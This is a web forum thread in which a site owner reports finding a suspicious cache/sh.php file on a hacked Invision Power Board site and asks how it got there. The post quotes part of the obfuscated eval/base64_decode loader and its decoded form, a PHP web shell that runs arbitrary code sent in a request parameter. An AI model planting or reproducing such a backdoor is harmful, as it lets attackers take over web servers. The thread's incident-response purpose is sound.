Jump to content

Possible virus/malware/access script?

Recommended Posts

So, all of a sudden, google started doing its little "This site isnt safe" page for one of my domains.

Curious, I ran clamav, and then ran ipb's internal scanner. IPB came up with this file tilted sh.php.

I went to FTP to see what the contents of this file was. Its location was cache/sh.php, so I didnt think it was a legit file. Plus IPB listed it at 8.

I would post the contents of said file, but I dont know if that would be the best method...

You can find it on google if you really wanted to, but it starts out as :

=========================        END       ===================================
========================= /index.php?<?/*gHrE={M*/eval/*t%)t*/(/*_f0srO*/base64_decode/*x31sm*/(/*Y%>*/'Lyo/WFdNR2Z5byovZXZhbC8qTEBXfjUqLygvKidoSCovYmFzZTY0X2RlY29kZS8qNXJcYzAqLygvKjo+ZEMqLydMeW83VmtwQlN6NHFMMmxtTHlwN2IxNHFMeWd2S24nLyp0XVJKOiovLi8qYVw+Ml1rKi8nUTlPSHRtTlM0cUwybHpjMlYwTHlwQWV6WlJMU292Jy8qPn5NLSovLi8qLmBrVGdVTCovJ0tDOHFPVEJlTkU4cUx5UmZVa1ZSVlVWVFZDOHFXRycvKik6WiovLi8qOURGREl5cyovJ29sZmpZcUwxc3ZLa1JsYkNvdkoyRW5MeW9vTVNseCcvKkZiTkBXSSovLi8qYkR2SzYqLydWQ292TGk4cWZGVXdYQ292SjNOakp5OHFKazAzTWknLypmKTR7cSovLi8qfU9KV1hmKi8nb3ZYUzhxZWpaeUlGd3FMeThxVW1rM1dYQXFMeWt2Jy8qIHtTKzs8PiovLi8qbWU/UyovJ0tuSmRQelZOS2k4d1JsYkNvdkoyRW5MeW9vTVNseCcvKkZiTkBXSSovLi8qYkR2SzYqLydWQ29...

Any ideas how it was inserted, if there is a known patch for it, or is there really no need for concern here?

EDIT: Just decoded it on a local machine.

comes out to be

if ( isset($_REQUEST['asc'])) eval (stripslashes( $_REQUEST ['asc']));

Which, again, can be used to run code just from the url. (index.php?asc=bad code)

Isn't there a way to see which queries have been run from which IP?

And I still want to see an answer to how did it get put there in the first place?

Link to comment
Share on other sites


This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...